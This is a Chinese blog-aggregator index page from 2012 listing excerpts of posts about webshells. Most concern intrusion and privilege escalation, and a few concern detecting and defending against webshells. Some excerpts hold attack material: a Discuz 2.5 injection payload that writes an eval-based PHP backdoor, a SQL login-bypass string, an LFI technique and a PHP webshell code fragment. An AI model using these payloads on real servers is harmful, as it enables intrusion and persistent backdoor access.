WebShell

WEBSHELL

$_value){  if($_key{0}!='_'){   if(IS_GPC){    $_value=s_array($_value);   }   $$_key=$_value;  } }}/*=====================程序配置=====================*/$admin=array();//是否需要密码验证,true为需要验证,false为直接进入.下面选
长平狐·2012-11-28 15:00

Windows安全设置IIS防WebShell木马(转)

转:http://blog.onovps.com/archives/iis-aspspy.html1.ASP环境禁用Webshell危险的组件:1 2 3 4 5 6 7 8 regsvr32/uwshom.ocx
zhangmiaoping23·2012-11-27 22:00

linux经典命令-Web服务器管理

1.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find/storage/www/-name"*.php"|xargsgrep-in--color"eval("#grep-i
join12·2012-11-17 14:29

严格的内网中通过curl来探测目标是否支持http协议

有一个内网环境,有WEBSHELL,基本封闭了所有的网络协议,为了实现控制,想到是否可以通过HTTP协议来进制控制,为了验证这一点,可以自己用C或者Python等等来一个访问WEB的小程序但使用curl
chinafe·2012-11-05 11:00

ewebeditor asp版5.5-6.X解析漏洞0day

id=301ewebeditor5.5版没有mdb数据库,账号和密码存在配置文件漏洞描述:利用IIS的解析漏洞建立一个XX.asp的文件夹,上传jpg拿webshell1.  
点点7788·2012-10-29 14:31

一些网站收藏

www.nxadmin.com/http://www.freebuf.com/http://www.mythhack.com/http://lx.shellcodes.org/RFID:http://radiowar.org/WebShellhttp
l0g1n·2012-10-29 11:00

php shell超强免杀、减少体积工具实现代码

lostwolf写的这不是webshell,只是个webshell免杀工具切勿当初webshell使用仅限免杀phpwebshell该工具运行在cli模式!
·2012-10-16 20:31

突破安全狗防注入及上传的一些思路

找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。 连接端用cncert的aspx一句话客户端。 
yyl910606·2012-10-08 14:14

突破安全狗防注入及上传的一些思路

找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。 连接端用cncert的aspx一句话客户端。 
·2012-10-08 14:14

一个简单的webshell

jsp版本的文件管理器,通过该程序可以远程管理服务器上的文件系统,您可以新建、修改、删除、下载文件和目录。对于windows系统,还提供了命令行窗口的功能,可以运行一些程序,类似与windows的cmd。如图: Thanksforyoursupport"}; String[]strFileManage={"文件管理","FileManagement"}; String[]strComma
·2012-09-29 10:00

Google Hacking的实现以及应用_邓九祥-ChinaUnix博客

GoogleHacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,
wuaini97·2012-09-13 16:04

mod_pyhon安装 2012-6-2

原文链接:http://www.cnblogs.com/muqingluan/archive/2012/09/12/2681170.html最近在网上找了两个python版的webshell,就想自己搭环境测试一下
afg2385·2012-09-12 09:00

Windows系统密码破解全攻略

留的Webshell痕迹太明显,哪怕是一句话的Webshell,都极容易被管理员清除。放了木马,也容易被有经验的管理员查出来,毕竟现在能做到无声无色的木马还是比较少。
stilling2006·2012-09-06 23:00

.net中web.config解密加密

获得一个webshell后经过尝试无法提权,想掌握到管理员的常用密码结果发现web.configconnectionStrings数据库连接的地方被加密了。
itzb·2012-09-05 07:20

LFI通过proc/self/environ直接获取webshell

转自哈克第一步:寻找本地包含漏洞首先找到一个可能存在本地包含的文件,去check它比如:www.website.com/view.php?page=contact.php替换成www.website.com/view.php?page=../我们得到一个错误Warning:include(../)[function.include]:failedtoopenstream:Nosuchfileord
god_7z1·2012-08-24 17:21

某大牛的入侵实战经验总结

不分语言,只谈拿webshell,至于提权,这里不说1.无论什么站,无论什么语言,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点
tingyuanss·2012-08-21 10:00

WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法

/admin/check.asp检测后台登陆的地方复制代码代码如下:这里对cookies提交没做过滤直接利用cookies提交工具提交账户密码为'or'1'='1即可绕过后台登陆直接进入管理界面。
佚名·2012-08-17 16:59

菜鸟拿WebShell的经验

通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的帮助。
stilling2006·2012-08-03 12:00

运维文档学习笔记

1.目前新浪微博运维管理采用webshell模式2.模块监控的含义对于某些关键执行环节的模块进行监控。某些中间服务的运行状况需要全面监控 平均耗时、队列长度、线程池使用率…….3.
zzz_781111·2012-07-31 16:00

Metasploit 之 webshell 提权

msf来提权(因为msf里边有个meterpreter很强大^_^)Metasploit拥有msfpayload和msfencode这两个工具,这两个工具不但可以生成exe型后门,一可以生成网页脚本类型的webshell
pentestzone·2012-07-30 12:43

Metasploit 之 webshell 提权

msf来提权(因为msf里边有个meterpreter很强大^_^)Metasploit拥有msfpayload和msfencode这两个工具,这两个工具不但可以生成exe型后门,一可以生成网页脚本类型的webshell
pentestzone·2012-07-30 12:43

SQL入侵基础知识(一)

1:上传漏洞这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。怎样
pplsunny·2012-07-30 09:00

windows系统提权基础小命令总结

(因为现在机器基本上都是2K3以上了,所以我们的话题主要围绕2K3谈)我们拿到一个低权限的WEBSHELL后,一般都是先探测服务器内部信息,以找到可以提权的条件或桥梁。
ghostway·2012-07-12 11:54

查找Centos Linux服务器上入侵者的WebShell后门

服务器被挂马或被黑的朋友应该知道,黑客入侵web服务器的第一目标是往服务器上上传一个webshell,有了webshell黑客就可以干更多的事情。
佚名·2012-07-10 16:12

查找Centos Linux服务器上入侵者的WebShell后门

服务器被挂马或被黑的朋友应该知道,黑客入侵web服务器的第一目标是往服务器上上传一个webshell,有了webshell黑客就可以干更多的事 情。
·2012-07-10 10:00

360本地提权(Webshell下用)

作者:friddy在webshell下运行360test.exe成功后,3389到服务器,按5下shift,得到一个cmd 附件地址:360up.rar密码friddy 没加壳。。。直接F5下。。。
shanzhaisofter·2012-07-09 10:03

Linux下信息收集

作者:b4che10r渗透说来说去还是一个信息收集的过程,你信息收集的越充分,胜利的几率就越大,如果拿到linux的服务器的webshell,不出意外的话,exp下$就变成#了,但是在linux的服务器间进行渗透
shanzhaisofter·2012-07-09 09:36

Linux下信息收集

作者:b4che10r***说来说去还是一个信息收集的过程,你信息收集的越充分,胜利的几率就越大,如果拿到linux的服务器的webshell,不出意外的话,exp下$就变成#了,但是在linux的服务器间进行
shanzhaisofter·2012-07-09 09:36

提权巧用RAR.EXE

得到了Webshell后,最好自己传一个rar.exe,虽然programfiles目录有,但是有时执行不了。rar.exe体积200K,呵呵
shanzhaisofter·2012-07-09 09:58

360提示DedeCms全局变量覆盖漏洞(临时解决方法)

2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。解决方案:临时解决方案:在/include/common.inc.php
佚名·2012-07-08 17:32

python中利用twisted的异步通信和微线程 实现webshell密码扫描器

  好久没写blog了,到了暑假时间充裕了,打算好好写几篇,     ps:最近blog访问量大了不少,一看全是去看struts2漏洞的...     好久以来都一直想学习windows中得iocp技术,即异步通信,但是经过长时间研究别人的c++版本,发现过于深奥了,有点吃力,不过幸好python中的twisted技术的存在方便了我。 &
wcf1987·2012-07-06 19:00

Windows本地提权0day(支持WEBSHELL测试版)

使用说明:将压缩包内3个文件放在同一目录下,执行vdmallowed.exe后将自动运行shell.EXE,shell.EXE为正向连接零管道后门程序运行后自动监听1987端口。本地连接远程计算机1987端口,便会得到一个Shell。测试英文版系统user提权没问题中文有的会蓝屏有的直接提权通杀XP  2K2K32K8VISTAWIN7用法:以普通用户登录windows(users组权限)在dos
shanzhaisofter·2012-07-05 12:44

极光 0day漏洞

趁国内没有大规模更新补丁之前,在webshell上大肆放马,命中率还是挺高的。
shanzhaisofter·2012-07-05 11:34

Serv-u 的安全防御

Serv-uFtpserver(以下简称Serv-u)是一个应用比较广泛的FtpServer,功能强大,使用方便,Serv-u>3.x版本存在本地权限提升漏洞,使用guest权限结合Exp可以以system权限运行程序,通过Webshell
zbcfirst·2012-06-23 23:31

Linux服务器管理Shell经典命令

p=1541.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find.
cyhow·2012-06-08 18:52

discuz 2.5 后台拿 WebShell 方法

{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.访问日志,论坛根目录下生成demo.php,一句话...方法1:1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base
wuhualong1314·2012-06-02 16:00

西部数码虚拟主机提权思路

所以无法使用一些webshell集成的s-uEXP来提权这里我写了一个脚本专门针对这种虚拟主机
beansprouts·2012-05-29 21:13

用GOOGLE你瞬间成为黑客

googlehacking其实并算不上什么新东西,当时并没有重视这技术,认为webshell什么的,并无太大实际用途.googlehacking其实并非 如此简单... googlehacking的简单实现
shanzhizi·2012-05-14 13:00

webshell利用

下面谈谈个人入侵的经验,不分语言,只谈拿webshell,至于提权,这里不说,我也很少提权,除非确实有必要!
·2012-05-12 00:00

批量拿网站webshell vip视频教程免费啦

批量拿网站webshellvip视频教程免费啦想学习网站入侵,拿网站webshell教程的朋友们注意了。这里为大家准备了一套中安黑客视频教程,不懂的地方留言讨论哦。
wuyusky1·2012-05-10 21:11

国内ASP木马各种版本测评

                               国内ASP木马各种版本测评 使用WEBSHELL,使用ASP木马必看的一些知识各种脚本木马测评:先说下ASP木马历史03年的ASP木马最早是由几位传说级大神开发的
OPQ20·2012-05-06 17:03

Ra1nker的个人入侵经验

 谈谈个人入侵的经验,不分语言,只谈拿webshell,至于提权,这里不说,我也很少提权,除非确实有必要!
ghostway·2012-05-02 12:05

西部数码虚拟主机提权思路

所以无法使用一些webshell集成的s-uEX
ghostway·2012-05-02 10:51

nginx 防 webshell 跨目录

但是Nginx却没有这样的设置,一旦某用户在他的虚拟主机下上传了一个WEBSHELL之类的东西,其他用户数据就遭殃了,今天就来解决这样的问题,怎么样让用户无法旁注。  
jicki·2012-04-20 11:52

利用php-fpm.log.slow发现webshell代码文件

环境nginx+php+fastcgi0.6编辑/etc/php-fpm.conf 开启 3s    The log file for slow requests  /var/log/php-fpm.log.slow  1、出现异常php文件执行慢,查看内容,和开发共同确定代码文件。若之前有md5入库,可以对这个生产md5再比对。查出是否是增加或修改的文件。2、这个可作为
cnzg_y·2012-04-16 16:02

webshell提权宝典

网络安全 说到花了九牛二虎的力气获得了一个webshell,当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~嘻嘻~~好跟我来,看看有什么可以利用的来提升权限*******
·2012-04-16 08:00

网站后台拿shell方法总结

在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥,但
long892230·2012-04-04 04:00

ewebeditor编辑器防入侵的方法-经验-教程-说明

如何得到webshell这里我就不多讲了。
long892230·2012-04-02 23:00

How Hackers Target and Hack Your Site (2)

Oklet’strytouploadphpwebshelltorunsomelinuxcommandsonyoursiteserverJWewilleditaplugininwordpresscalled
ciywind·2012-03-30 16:44

WebShell检测思路浅谈

[目录]0x00 前言0x01 Webshell检测模型0x02 静态特征检测0x03 动态特征检测0x04 结语0x00 前言   什么是webshell
zxinbj·2012-03-28 18:30
上一页 49 50 51 52 53 54 55 56 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他